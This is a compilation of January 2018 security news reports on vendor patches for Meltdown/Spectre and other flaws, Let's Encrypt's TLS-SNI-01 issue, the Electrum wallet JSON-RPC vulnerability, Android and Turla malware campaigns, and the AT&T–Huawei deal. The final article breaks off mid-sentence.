English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


AT&T Backs Away From Deal to Supply China Made Huawei Phones
11.1.2018 securityweek IT
AT&T has reportedly walked away from a deal to provide new mobile phones to U.S. customers made by Chinese technology giant Huawei

Based in Shenzhen, China, Huawei announced in December 2017 that it would be supplying smartphones via U.S. carriers this year; and it was widely expected that a deal would be announced during the CES Huawei Keynote speech in Las Vegas on Tuesday.

But just one day earlier, The Wall Street Journal reported that AT&T had backed out the deal under political pressure. Members of the U.S. Senate and house intelligence committees had apparently written to the FCC on 20 December, 2017, noting concerns over "Chinese espionage in general, and Huawei's role in that espionage in particular."

It is assumed that this led to political pressure on AT&T to abandon the deal; and it is believed that Verizon is under pressure not to conclude a similar deal with Huawei later in the year. Huawei has been a persona non grata in U.S. official channels since a 2012 Congressional Report raised concerns over possible state-sponsored espionage delivered via Huawei communications equipment.

Huawei has always denied any involvement with the Chinese government; and the U.S. is almost alone in 'banning' (effectively, if not legally) Huawei equipment. Similar concerns in the UK government have to a large extent been mitigated by the ability to examine hardware and reverse engineer software under GCHQ overview at a location called The Cell in Banbury, near Oxford.

There is little official comment about what happened this week. It seems from Huawei's consumer business unit CEO Richard Yu's comments on Tuesday that Huawei blames AT&T for the break down of the deal. "It's a big loss for consumers," he told his audience, "because they don't have the best choice for devices."

Although entering the market late, Huawei is already the world's third largest supplier of smartphones, behind only Samsung and Apple. Access to the huge American market, where by far the majority of phones are provided by the carriers, will now be seriously limited. It is worth noting that there is no legal ban on Huawei phones, and the Chinese company will still sell them to American consumers through online outlets such as Amazon.

There are some similarities with the US government ban on Russia's Kaspersky Lab products. In both cases, concern has been raised over historical ties with the founders' respective governments. Eugene Kaspersky, founder and CEO of Kaspersky Lab, was educated at a KGB-sponsored school and served in the Russian military as a software engineer; while Ren Zhengfei, founder and president of Huawei Technologies Co, is an ex-People's Liberation Army officer. There is concern that both companies could retain covert relations with their respective governments.

There is, however, one very big difference. With Kaspersky Lab, the ban is on its use by federal agencies. With Huawei, the ban is effectively on anyone seeking to acquire Huawei hardware via a phone-and-data-plan from a carrier; that is, the Huawei ban excludes general consumers -- who could pose no national security risk -- from acquiring these phones in the most popular manner.

This in turn has raised some concerns that the pressure on AT&T is more economic and perhaps geopolitical than it is national security. Could it be additional political pressure on China to be more proactive against North Korea? Or could it be a visible manifestation of 'America First' and President Trump's demand that China balance bilateral trade between the two countries?

Either way, it is unlikely to be good for U.S./China relations.

The South China Morning Post today quoted He Weiwen, a former business counselor at the Chinese consulate in New York. "Investment cooperation between China and the U.S. will be squeezed," he said. "China should contemplate countermeasures."

However, at this stage it is only conjecture (however well-informed) that this is a U.S. political move -- without further details it could be an AT&T business decision.

"This might be because there is something preinstalled on the phones that AT&T doesn't agree with; for example, preinstalled software, certificate authority certificates and other things that might yield some kind of data gathering capabilities and/or control either directly or indirectly," noted F-Secure's principle security consultant Tom Van de Wiele. "It might be that Huawei is putting its foot down on the application eco-system and its rules."

He also pointed out further non-political issues that could have scuppered the deal. "The phone might be too 'open' in that it easily allows you to unlock it and switch telcos, away from AT&T -- and that's still a huge thing in the U.S."

Similarly, there are potential security issues with any phone, possibly heightened by Huawei phones using Huawei proprietary chips. "As Android devices come in a multitude of deployments -- it's easier for overly 'curious' features to get included without being noticed," F-Secure's security adviser Sean Sullivan told SecurityWeek. "There have been several cases in which vendors screwed up and included things such as Baidu components in European deployments."

But he added, "These were budget phones; you get the quality that you pay for. In the case of Huawei -- too many eyes are/would be auditing its devices -- it's doubtful that anything deliberate would be done via an AT&T phone." Sullivan is not convinced that the AT&T deal has been shelved for purely security concerns.

This is the second China deal to have been prevented in the last few days. Last week the U.S. Committee on Foreign Investment rejected Chinese firm Ant Financial's takeover bid for U.S.-based money transfer firm MoneyGram -- again citing national security concerns.


NVIDIA Updates GPU Drivers to Mitigate CPU Flaws
11.1.2018 securityweek
Vulnerebility
NVIDIA has released updates for its GPU display drivers and other products in an effort to mitigate the recently disclosed attack methods dubbed Meltdown and Spectre.

Shortly after researchers revealed the existence of the flaws that allow Meltdown and Spectre exploits, which can be leveraged to gain access to sensitive data stored in a device’s memory, NVIDIA announced that its GPU hardware is “immune,” but the company has promised to update its GPU drivers to help mitigate the CPU issues.

The Meltdown and Spectre vulnerabilities affect processors from Intel, AMD and ARM. Similar to Qualcomm, some of NVIDIA’s system-on-chip (SoC) products rely on ARM CPUs and the company has promised to develop mitigations.

On Tuesday, NVIDIA informed customers about the availability of GPU display driver updates that include mitigations for one of the Spectre vulnerabilities, specifically CVE-2017-5753. The company is still working on determining if the second Spectre flaw, CVE-2017-5715, affects its GPU drivers. On the other hand, there is no indication that the drivers are impacted by the Meltdown vulnerability (CVE-2017-5754).

NVIDIA has provided display driver updates for the Windows and Linux versions of GeForce, Quadro, and NVS graphics cards. In the case of Tesla GPUs, updates have been provided only for the R384 branch, while an update for R390 is expected to become available during the week of January 22. In the case of the GRID virtual GPU solution, updates should become available by the end of the month.

NVIDIA has also released updates for the Android-based Shield TV media player and Shield Tablet, and the Jetson embedded system, which is built around the Tegra mobile processor. The company says only the Jetson TX2 update includes mitigations for all three CPU vulnerabilities – the other updates include mitigations only for CVE-2017-5753 and in some cases CVE-2017-5715 (i.e. the Spectre flaws).

The mitigations for the Meltdown and Spectre vulnerabilities are known to introduce performance penalties for certain types of operations, but NVIDIA has not provided any information on this issue.

Intel says regular users should not see any difference after applying the fixes, but Microsoft’s tests show that most Windows 7 and 8 systems will likely incur significant penalties if they use 2015-era or older CPUs.

Tests conducted by Red Hat also showed significant slowdowns for certain types of operations. However, Amazon, Google and Apple said they had not seen any noticeable performance problems – although some AWS customers did report degraded performance.


Let's Encrypt Disables TLS-SNI-01 Validation
11.1.2018 securityweek
Vulnerebility
Free and open Certificate Authority (CA) Let’s Encrypt on Tuesday disabled TLS-SNI-01 validation after learning that users could abuse it to obtain certificates for domains they do not own.

The issue was found to have been created by the use of the ACME TLS-SNI-01 challenge type for domains on a shared hosting infrastructure. Discovered by Frans Rosén of Detectify, the bug could be abused for malicious purposes, which sparked Let’s Encrypt to disable TLS-SNI-01 validation entirely.

The issue doesn’t appear to be related to the certificate authority itself, but to a combination of factors. However, it is centered on the manner in which the ACME server (the CA) validates a domain name’s IP address as part of ACME protocol’s TLS-SNI-01 challenge.

As part of the process, a random token is generated. The ACME client uses it to create a self-signed certificate with an invalid hostname (.acme.invalid) and configures the web server on the domain name to serve the certificate, after which it looks up the domain name’s IP address, initiates a TLS connection, and sends the specific invalid hostname, awaiting to receive a self-signed certificate containing that hostname as response.

When that happens, “the ACME client is considered to be in control of the domain name, and will be allowed to issue certificates for it,” Josh Aas, Internet Security Research Group (ISRG) Executive Director, explains.

However, when more users are hosted on the same IP address, which happens with large hosting providers, and these users also have the ability to upload certificates for arbitrary names without proving domain control, the assumptions behind TLS-SNI are broken and an attack is possible.

Thus, if an attacker controls a website hosted at the same shared hosting IP address as a legitimate site, the attacker can run an ACME client to get a TLS-SNI-01 challenge, and obtain an illegal certificate for the legitimate website.

The attacker would simply install their .acme.invalid certificate on the hosting provider, which will serve it to the ACME server when it looks up the legitimate website. Next, the ACME server will consider the attacker’s ACME client as being authorized to issue certificates for the legitimate website, and the attack is successful.

“This issue only affects domain names that use hosting providers with the above combination of properties. It is independent of whether the hosting provider itself acts as an ACME client. It applies equally to TLS-SNI-02,” Aas explains.

Let’s Encrypt disabled TLS-SNI-01 immediately after becoming aware of the issue, but plans on restoring the service as soon as possible, given that a large number of people and organizations use the TLS-SNI-01 challenge type to get certificates. However, they won’t enable it until they consider it sufficiently secure.

“At this time, we believe that the issue can be addressed by having certain services providers implement stronger controls for domains hosted on their infrastructure. We have been in touch with the providers we know to be affected, and mitigations will start being deployed for their systems shortly,” Aas notes.

Let’s Encrypt is also working on creating a list of vulnerable providers and associated IP addresses and to re-enable the TLS-SNI-01 challenge type with vulnerable providers blocked from using it.


IBM Starts Patching Spectre, Meltdown Vulnerabilities
10.1.2018 securityweek
Vulnerebility
IBM has started releasing firmware patches for its POWER processors to address the recently disclosed Meltdown and Spectre vulnerabilities. The company is also working on updates for its operating systems, but those are expected to become available only next month.

On January 4, one day after researchers disclosed the Meltdown and Spectre attack methods against Intel, AMD and ARM processors, IBM informed customers that it had started analyzing impact on its own products. On Tuesday, the company revealed that its POWER processors are affected.

IBM told customers that attacks against its Power Systems server line can be fully mitigated only by installing both firmware and operating system patches.

The company has already released firmware patches for its POWER7+ and POWER8 processors, and fixes are expected to become available for POWER9 systems on January 15. Users of earlier products that are still supported will be notified at a later time about the availability of firmware updates.

Users whose devices run Linux can obtain operating system patches from their respective vendors. Red Hat, SUSE and Canonical have already released fixes. As for IBM’s own operating systems, namely AIX and IBM i, patches are expected to become available on February 12.

“If this vulnerability poses a risk to your environment, then the first line of defense is the firewalls and security tools that most organizations already have in place,” IBM explained.

The company has told customers that IBM storage appliances are not impacted by the vulnerabilities.

The mitigations for the Meltdown and Spectre vulnerabilities are known to introduce performance penalties for certain types of operations, but IBM has not mentioned anything about performance impact.

Intel says regular users should not see any difference after applying the fixes, but Microsoft’s tests show that most Windows 7 and 8 systems will likely incur significant penalties if they use 2015-era or older CPUs.

In addition to performance penalties, some mitigations also cause problems due to compatibility issues. Microsoft has required security product vendors to set a specific registry key in order for their customers to receive security updates. Furthermore, one of the company’s updates has been found to break computers with some older AMD processors.


Industrial Cybersecurity Firm Nozomi Networks Raises $15 Million
10.1.2018 securityweek ICS
Industrial cybersecurity firm Nozomi Networks has raised $15 million in a Series B funding round, the company announced Wednesday. The new funding brings the total amount raised by the company to date to $23.8 million.

Nozomi’s flagship offering, SCADAguardian, employs machine learning and behavioral analysis to detect zero-day attacks in real-time; while integration with firewalls and SIEMs, ICS incident alerting and notification systems allow rapid response to alerts.

The company said the additional funding will be used to support worldwide expansion of marketing, sales and support and further bolster product innovation.

Nozomi%20Networks

Nozomi Networks Exhibits at SecurityWeek's 2017 ICS Cyber Security Conference in Atlanta (Image Credit: SecurityWeek)
The company claims to be rapidly gaining new customers across 5 continents, with more than 200 deployments that span energy, manufacturing, pharmaceuticals, chemicals, mining, utilities and other sectors.

“Now is a prudent time for funding to meet this exploding market opportunity,” said Nozomi Networks CEO Edgard Capdevielle. “We resisted the temptation of raising too much funding before our product leadership was established.”

“FireEye’s recent discovery of Triton malware in the wild highlights how critical infrastructure facilities are increasingly at risk. After extensive testing, we've partnered with Nozomi Networks because they provide the right solution customers need to detect these attacks at the earliest stages and minimize the impact before the safety and reliability of their critical operations is threatened,” Grady Summers, CTO at FireEye, said in a statement.

The Invenergy Future Fund led the Series B round with participation from THI Investments and all existing investors, GGV Capital, Lux Capital and Planven Investments SA. Nozomi previously raised $7.5 million in a Series A funding round in late 2016.

Nozomi is one of several security startups targeting the industrial space that have recently raised funding. Others include Dragos, Indegy, Bayshore Networks, CyberX, Claroty, and SCADAFence. Veteran industrial software firm PAS raised $40 million in April 2017. Darktrace, which has an offering targeted to the industrial sector, recently raised $75 million at a valuation of $825 million.


Rockwell Automation Patches Serious Flaw in MicroLogix 1400 PLC
10.1.2018 securityweek
Vulnerebility
A firmware update released a few weeks ago by Rockwell Automation for its MicroLogix 1400 programmable logic controllers (PLCs) patches a potentially serious vulnerability.

The MicroLogix PLC family is used worldwide by organizations in the critical infrastructure, food and agriculture, and water and wastewater sectors for controlling processes.

Thiago Alves from the University of Alabama in Huntsville (UAH) discovered that these controllers are affected by a buffer overflow vulnerability. In 2016, Alves and two other UAH researchers published a paper on using virtual testbeds for industrial control systems (ICS).Rockwell Automation MicroLogix 1400 PLC

Rockwell%20Automation%20MicroLogix%201400%20PLC

According to Rockwell Automation, the expert discovered that several MicroLogix 1400 PLCs running version 21.002 and earlier of the firmware are affected by a buffer overflow vulnerability that can be triggered by sending specially crafted Modbus TCP packets to affected devices. The flaw can be exploited remotely by an unauthenticated attacker.

“The Modbus buffer is not deallocated when a packet exceeds a specific length. Repeated sending of Modbus TCP data can cause a denial of service to the Modbus functionality, and potentially cause the controller to fault,” the vendor explained.

The security hole is tracked as CVE-2017-16740 and it has been classified by both Rockwell and ICS-CERT as high severity with a CVSS score of 8.6. While Rockwell’s advisory only mentions DoS attacks, ICS-CERT’s advisory says it may also be possible to exploit the flaw for remote code execution.

Rockwell Automation patched the vulnerability last month with the release of firmware version 21.003 for series B and series C hardware. As a workaround, users can disable Modbus TCP support if it’s not needed, which prevents remote access to the device.

Last month, after discovering a serious DoS vulnerability in several product lines from Siemens, experts at industrial cybersecurity firm CyberX pointed out that these types of flaws should not be taken lightly.

“The December 2016 attack on the Ukrainian electrical grid used this type of exploit to disable protection relays and make it more difficult for operators to recover,” the company told SecurityWeek at the time.


Android Malware Developed in Kotlin Programming Language Found in Google Play
10.1.2018 securityweek Android
Security researchers at Trend Micro have discovered a malicious application in Google Play that was developed using the Kotlin programming language.

Detected as ANDROIDOS_BKOTKLIND.HRX, the malicious program was masquerading as Swift Cleaner, a utility designed to clean and optimize Android devices. The application had between 1,000 and 5,000 installs when discovered.

Kotlin, a first-class language for writing Android apps, was announced in May 2017. Coming from Google, it is open source and is already used by 17% of Android Studio projects. Some of the top applications to use the programming language include Twitter, Pinterest, and Netflix.

Developers using Kotlin can deliver safer applications, due to avoiding entire classes of errors, and can also ensure their software is interoperable by taking advantage of existing libraries for JVM, Android, and the browser. What’s yet uncertain is how malware developers can leverage the programming language when building nefarious code.

The discovered malicious application, Trend Micro says, can engage into a broad range of nefarious activities, including remote command execution. It is also capable of stealing users’ information, sending SMS messages, forwarding URLs, and performing click ad fraud. Furthermore, it has been designed to sign up users for premium SMS subscription services without their permission.

When first launched, the malware sends device information to a remote server and starts a background service to receive tasks from the command and control (C&C) server. Upon the initial infection, the malware also sends a message to a specified number provided by the C&C.

Upon receiving SMS commands, the remote server starts executing URL forwarding and click ad fraud operations on the infected device.

During the click ad fraud routine, the malware uses Wireless Application Protocol (WAP), a technical standard for accessing information over a mobile wireless network. Next, malicious JavaScript code is injected and regular expressions are replaced, so that the malicious actors can parse the ads’ HTML code in a specific search string.

“Subsequently, it will silently open the device’s mobile data, parse the image base64 code, crack the CAPTCHA, and send the finished task to the remote server,” Trend Micro explains.

The malicious program can send information on the service provider, login data, and CAPTCHA images to the C&C server. Once such information is uploaded, the C&C server automatically processes a premium SMS service subscription, which can cost the victim money.

To stay protected from such threats, both end users and enterprise customers are advised to install and maintain a security solution on their devices.

According to Trend Micro, Google was informed on the security risk the Swift Cleaner application poses and the company verified that Google Play Protect can keep users safe from this malware family.


SAP Publishes Light Patch Day for January 2018
10.1.2018 securityweek
Vulnerebility
SAP this week released its monthly set of security patches to address just three vulnerabilities in its products, all three rated Medium severity.

In addition to the three security notes, the January 2018 SAP Security Patch Day includes four updates to previously released security notes. These too had a Medium severity rating, the company said.

The most severe of the patches were updates to a security note released in October 2014, which addressed a code injection bug in Knowledge Provider. The issue is tracked as CVE-2018-2363 and features a CVSS score of 6.5.

“Depending on the code, attackers can inject and run their own code, obtain additional information that should not be displayed, change and delete data, modify the output of the system, create new users with higher privileges, control the behavior of the system, or escalate privileges by executing malicious code or even perform a DOS attack,” ERPScan, a company that specializes in securing SAP and Oracle products, explains.

SAP also released an update to a security note released in December 2017, addressing CVE-2017-16690, a DLL preload attack possible on NwSapSetup and Installation self-extracting program for SAP Plant Connectivity (CVSS score 5.0).

Newly resolved issues include CVE-2018-2361, an Improper Role Authorizations in SAP Solution Manager 7.2 (CVSS score 6.3), CVE-2018-2360, Missing Authentication check in Startup Service (CVSS score 5.8), and CVE-2018-2362, Information Disclosure in Startup Service in SAP HANA (CVSS score 5.3).

By exploiting CVE-2018-2360, an attacker could access a service “without any authorization procedures and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation and other attacks,” ERPScan reveals.

CVE-2018-2361’s exploitation could provide an attacker with the possibility to edit all tables on the server, which could result in data compromise, the company continues.

ERPScan, which considers the code injection security note updates as a single patch, says that 10 SAP Security Notes (5 SAP Security Patch Day Notes and 5 Support Package Notes) were closed with the January 2018 SAP Security Patch Day. 3 were updates to previous security notes and 5 were released after the second Tuesday of the previous month and before the second Tuesday of this month.


Electrum patches a critical flaw that exposed Bitcoin Wallets to hack since 2016
10.1.2018 securityaffairs
Vulnerebility

The development team behind the popular Electrum Bitcoin wallet app has issued an emergency patch for a critical vulnerability in the company bitcoin wallets.
Electrum is a free application that’s used by many cryptocurrency sites to store bitcoin. Administrators can run their own Electrum server and the software supports hardware wallets such as Trezor, Ledger and Keepkey.

The development team behind the popular Electrum Bitcoin wallet app has issued an emergency patch for a critical vulnerability in the company bitcoin wallets.

The vulnerability allowed any website hosting the Electrum wallet to potentially steal the user’s cryptocurrency.

The flaw seems to be present in the software for almost two years, it is related to the exposure of passwords in the JSONRPC interface.

The company first issued a security patch failed to address the issue, but it failed, then Electrum opted out to issue a second update on Sunday evening.

The story has begun in November when many researchers observed numerous massive scans going on for Bitcoin and Ethereum wallets in order to steal their funds.

The security expert Didier Stevens observed a significant scanning activity over the weekend, just two days before Bitcoin price jumped from $7,000 to over $8,000.

The researcher observed a huge number of requests to his honeypot to retrieve Bitcoin wallet files.
Of course, the crooks were exploring the possibility to target also other cryptocurrencies, such as the Ethereum. Very interesting the analysis proposed by Bleepingcomputer.com that reported the discovery made by the researcher Dimitrios Slamaris.

The security expert reported Internet wide Ethereum JSON-RPC scans.

The expert caught a JSON RPC call in his honeypot, someone was making requests to the JSON-RPC interface of Ethereum nodes that should be only exposed locally.

The access to the interface does implement any authentication mechanism and wallet apps installed on the PC can send command to the Ethereum client to manage funds. If the interface is exposed inline, attackers can send requests to this JSON-RPC interface and issue commands to move funds to an attacker’s wallet.

Early November, Slamaris uncovered another massive scan that allowed the attacker to steal 8 Ethers (about $3,200 at current exchange).

Slamaris teamed with SANS Internet Storm Center expert Johannes Ullrich also uncovered a second campaign, they discovered two IP addresses were scanning specifically hard using these requests:
216.158.238.186 – Interserver Inc. (a New Jersey hosting company)
46.166.148.120 – NFOrce Entertainment BV (Durch hosting company)
A user going by the name of “jsmad” noticed that the Electrum wallet app was also exposing a similar JSON RPC online.

“The JSONRPC interface is currently completely unprotected, I believe it should be a priority to add at least some form of password protection.” wrote the user.

“Scans for the JSONRPC interface of Ethereum wallets have already started:
https://www.bleepingcomputer.com/news/security/theres-some-intense-web-scans-going-on-for-bitcoin-and-ethereum-wallets/“

The knowledge of the Electrum password allowed attackers to interact through the JSON RPC interface with the wallers.

The Electrum developers were criticized by the claim of the popular Google white hat hacker Tavis Ormandy who contacted the company.

“Hello, I’m not a bitcoin user, a colleague pointed me at this bug report because localhost RPC servers drive me crazy 😛.” wrote Ormandy.

“I installed Electrum to look, and I’m confused why this isn’t being treated as a critical and urgent vulnerability? If this bug wasn’t already open for months, I would have reported this as a vulnerability, but maybe I misunderstand something.

The JSON RPC server is enabled by default, it does use a random port but a website can simply scan for the right port in seconds.

I made you a demo. It’s very basic, but you get the idea. If you did set a password, some misdirection is required, but it’s still game over, no?

Here is how I reproduced:

Install Electrum 3.0.3 on Windows.
Create a new wallet, all default settings. I left the wallet password blank – the default setting.
Visit in Chrome.
Wait a few seconds while it guesses the port, then an alert() appears with:
seed: {"id": 0.7398595146147573, "result": "pony south strike horror throw acquire able afford pen lunch monster runway", "jsonrpc": "2.0"}
(Note: i dont use bitcoin, you can steal my empty wallet if you like)”

In a real attack scenario, hackers could trick Electrum users into accessing a malicious website that could scan for the Electrum’s random JSON RPC port and empty the wallet by issuing commands.

Below a video of such kind of attack shared by a Twitter user.


@h43z
Update your #electrum wallets. Only having the program running and surfing the web can be unsafe. Any website can steal your wallet if it is not protected with a password or if it's easy to guess it can be bruteforced #bitcoin

8:02 PM - Jan 7, 2018
10 10 Replies 251 251 Retweets 361 361 likes
Twitter Ads info and privacy
The Electrum development team released the version 3.0.5 that addresses the vulnerability, users urge to update their wallet app.

According to the developers, the flaw affects versions 2.6 to 3.0.4 of Electrum, on all platforms. It also affects clones of Electrum such as Electron Cash.

“In addition, the vulnerability allows an attacker to modify user settings, the list of contacts in a wallet, and the “payto” and “amount” fields of the user interface while Electrum is running.” reads the analysis published by the Electrum development team.

“Although there is no known occurrence of Bitcoin theft occurring because of this vulnerability, the risk increases substantially now that the vulnerability has been made public.”


How Antivirus Software Can be the Perfect Spying Tool
10.1.2018 securityweek
Virus
Your antivirus product could be spying on you without you having a clue. It might be intentional but legitimate behavior, yet (malicious) intent is the one step separating antivirus software from a cyber-espionage tool. A perfect one, experts argue.

Because we trust the antivirus to keep us safe from malware, we let it look at all of our files, no questions asked. Regardless of whether personal files or work documents, the antivirus has access to them all, which allows it to work as needed.

We do expect a security product to work in this manner, as most of them have been designed to scan all files on the system to detect any possible threats, and we accept this behavior as being part of our computer’s protection mechanism.

What if the very same features that are meant to protect us from threats become the threats themselves? Would it be possible for an antivirus application to be used as a spying tool, to flag documents of interest and exfiltrate them instead of keeping our files safe? The answer appears to be “Yes!”

"In order for AV to work correctly, it has to be plumbed into the system in such a way that it can basically see and control anything the system can do. Memory allocation, disk reads and writes, communication, etc... This means that it is essentially in the middle of all transactions within the OS. Therefore, it makes a pretty good candidate for take over and compromise,” Jason Kent, CTO at AsTech, told SecurityWeek via email.

In some cases, the data exfiltration, which is legitimate behavior, could result in unintended leakage, as would be the case with security programs that upload binaries to cloud-based multiscanners like Google’s VirusTotal. In an attempt to better assess whether files are malicious or not, these security tools end up leaking data if the analyzed files are accessible to the multiscanner’s subscribers.

But what if your antivirus was intentionally turned into a tool that could spy on you? Would that be possible without modifying the program itself? According to security researcher Patrick Wardle, it is possible.

To prove this and using the "Antivirus Hacker's Handbook" (Joxean Koret) as base for an experiment, he tampered with the virus signatures for Kaspersky Lab’s Internet Security for macOS and modified one of the signatures to automatically detect classified documents and mark them for collection. By modifying signatures instead of the antivirus engine, he didn’t alter the security application’s main purpose.

Wardle conducted his experiment on a Kaspersky product for an obvious reason: last year, reports suggested that the Russian-based security company’s software had been used to steal classified documents from a National Security Agency (NSA) contractor’s computer. The contractor took home sensitive data, including NSA exploits, and was apparently targeted by hackers after a Kaspersky product on his home computer flagged the files as malicious and sent them to the company’s server for further analysis.

In December 2017, the NSA contractor, Vietnam-born Nghia Hoang Pho, agreed to plead guilty to removing and retaining top-secret documents from the agency. Last week, another NSA contractor agreed to plead guilty after being accused of hoarding around 50 terabytes of NSA data and documents in his home and car over a 20-year period.

In September 2017, the United States Department of Homeland Security (DHS) ordered government departments and agencies to stop using Kaspersky products due to concerns regarding the company’s ties to Russian intelligence. Last month, Lithuania said it would ban Kaspersky Lab's products from computers managing key energy, finance and transport systems due to security concerns.

The anti-virus maker has continually denied any connections to the Russian government and even launched a new transparency initiative to clear its name. In December, the company sued the U.S. government over the product ban.

So far, no evenidence has been presented that shows any inappropriate connections between Kaspersky Lab and the Russian government.

In a technical analysis published last year, Kaspersky suggested the report might be referring to a 2014 incident where its antivirus worked as intended by flagging what appeared to be suspected Equation malware source code on a personal computer. The company said it had deleted the files from its servers but couldn’t confirm the NSA contractor was involved in the incident.

What Wardle decided to do was to find out whether the Moscow-based security company’s products can indeed be used to flag and exfiltrate classified documents. He successfully managed to modify a signature for his security product, despite the complex process Kaspersky employs for updating and deploying virus signatures onto the users’ computers.

And while he made the modifications locally, his experiment demonstrated that it is indeed possible to abuse anti-virus programs to spy on users. By modifying their signatures, antivirus programs can become “the absolute perfect cyber-espionage collection” tools. And this isn’t true about Kaspersky’s products only.

“Of course if an anti-virus company wanted to (or was forced to) they'd simply deploy a new signature likely to select clients (targets), in order to persistently detect such documents […]. I am confident without a doubt that any anti-virus product with collection capabilities could arbitrarily collect (exfiltrate) files flagged by their product,” Wardle noted.

The file collection capability is, of course, designed to support legitimate functionality of the product. Thus, for an antivirus product to become a spying tool, it would have to have an actor with malicious intent behind it.

“A malicious or willing insider within any anti-virus company, who could tactically deploy such a signature, would likely remain undetected. And of course, in a hypothetical scenario; any anti-virus company that is coerced to, or is willing to work with a larger entity (such as a government) would equally be able to stealthily leverage their product to detect and exfilitrate any files of interest,” Wardle concluded.

The researcher’s findings aren’t surprising and Kaspersky themselves said last week that “any malicious actor who gains administrative access to a computer could theoretically engage in file searching activity on the computer or subvert almost any application running on it (which is the type of activity that Kaspersky Lab products are designed to detect and prevent).”

SecurityWeek contacted Kaspersky for comment, but they redirected us to last week’s statement, saying that that is their official position.

Security experts contacted by SecurityWeek for perspective agree that antivirus products could potentially be used for nefarious purposes, if a malicious actor was involved. While the general consensus is that users wouldn’t even know if their antivirus was spying on them, it doesn’t mean that antivirus companies engage in such practices. Only that it would be possible to use their products in such a manner.

“AV vendors must be very careful to ensure they are never compromised. Imagine if I could control all of the AV installations at an enterprise. It would be possible to make all of those machines participate in a botnet or use the AV system to load additional code, such as Ransomware. This is conceptually possible as the engine and signatures are designed to be changed via an update process. Compromise there would be a very interesting thing for sure,” Kent told us.

Chris Morales, head of security analytics at San Jose, California-based Vectra Networks, agrees that antivirus products could be manipulated to find and exfiltrate sensitive documents. He also agrees that this could be the act of a malicious or willing insider at any antivirus company.

“AV vendors, as do many security vendors who perform malware scanning on the network and endpoint, have administrative level access to systems to scan files for malicious code. This scanning engine could be manipulated to look for sensitive documents and then upload them to the cloud analysis engine. This would most likely be someone at the vendor with malicious intent,” Morales told SecurityWeek in an emailed comment.

“Security vendors who perform cloud based analysis have to walk a very thin line and it is important that these vendors implement the proper controls to ensure they do not create the security hole for customers. I would say most vendors do a very good job of ensuring their processes are secure and would not cause a problem for the client. This does mean there is a level of trust in security vendors that clients need to validate and should be asking for a description of how their detection processes work,” Morales continued.

Chris Roberts, chief security architect at Santa Clara, Calif.-based threat protection firm, told SecurityWeek that it is a known fact that “Kaspersky is not the only tool that’s built into enterprises to be used against themselves for the fortunes of malicious intent.” Over the past couple of years, several endpoint detection tools have been revealed to have issues identifying problems and to include management techniques that can be turned against enterprises.

“So, yes, Kaspersky software can be used against the intended targets, we have established that. The mechanism is there, however, the INTENT is the issue. The analysis into IS it being used against organizations is the factor that is obviously in dispute. Late last year, the UK took the step to warn all agencies against deploying Kaspersky. The US has already taken that step, but in all honesty, IF we were to look at the plethora of endpoint detection/manipulation/management tools out there, we’d better remove 50% of them for the same insecurities and inabilities to protect the very end-users we’re trying to save,” Roberts says.

He also points out that most security software out there requires access to everything stored on a computer, not only one single product. “The others all being carefully kept out of the news in the hope we don’t all suddenly wake up and realize that everything designed to keep us safe is also designed to access our darkest secrets… and scour them for whatever we hope it’s meant to be finding… or what it WANTS to find,” Roberts continued.

Of course, there’s no proof that an antivirus program has been used for malicious intent, although it is clear that they could be used in such a manner. As Wardle puts it: “Please avoid jumping to the conclusion that this [is] something Kaspersky, or any other anti-virus company actually did!”

Kaspersky Lab has continually denied any inappropriate ties to the Russian intelligence services; and there is no public evidence to suggest otherwise. Unfortunately, for the Moscow-based security company, this is a restult of the effect of geopolitics on cybersecurity.


Turla APT group’s espionage campaigns now employs Adobe Flash Installer and ingenious social engineering
10.1.2018 securityaffairs APT

Turla APT group’s espionage campaigns now employs Adobe Flash Installer and an ingenious social engineering technique, the backdoor is downloaded from what appears to be legitimate Adobe URLs and IP addresses.
Security researchers from ESET who have analyzed recent cyber espionage campaigns conducted by the dreaded Turla APT group reported that hackers leverage on malware downloaded from what appears to be legitimate Adobe URLs and IP addresses.

Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.

The list of victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla.

In the most recent attacks, the group is packaging its macOS backdoor with a real Adobe Flash installer and downloading the malware on victim systems from endpoint systems that use a remote IP belonging to Akamai, the Content Delivery Network that is also used by Adobe for its supply chain. Legitimate Flash installer, in fact, are also distributed through the Akamai network.

“In recent months, we have observed a strange, new behavior, leading to compromise by one of Turla’s backdoors. Not only is it packaged with the real Flash installer, but it also appears to be downloaded from adobe.com.” reads the report published by ESET.

“From the endpoint’s perspective, the remote IP address belongs to Akamai, the official Content Delivery Network (CDN) used by Adobe to distribute their legitimate Flash
installer. “

Researchers noted that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016, data were sent back to legitimate URLs at Adobe.com. The download attempts observed by ESET observed were made through HTTP and not via HTTPS, the researchers state with confidence that Adobe was not compromised.

The social engineering technique adopted by Turla group to trick victims into believing they are downloading a legitimate software from Adobe server is very ingenious.

Data collected by the experts revealed that most of the victims belong to the former USSR, targeted entities include embassies and consulates located in East Europe.

At the time of the report is still unclear how the Turla APT group distributed the backdoor through Adobe.com.

Experts speculate that this is possible by compromising a machine on the victim’s network to perform a local man-in-the-middle attack. In this attack scenario, the threat actors redirect traffic from a target system through the compromised server and modifying it on the fly. Another possibility is to leverage on a compromised local gateway that could allow the attackers to potentially intercept and modify traffic for the whole organization.

Other attacks scenarios see Turla executing a man-in-the-middle attack at the ISP level, or BGP hijacking.

“We quickly discarded the hypothesis of a rogue DNS server, since the IP address corresponds to the servers used by Adobe to distribute Flash.” continues the report. “Thus, these are the hypotheses that remain: ➊ a Man-in-theMiddle
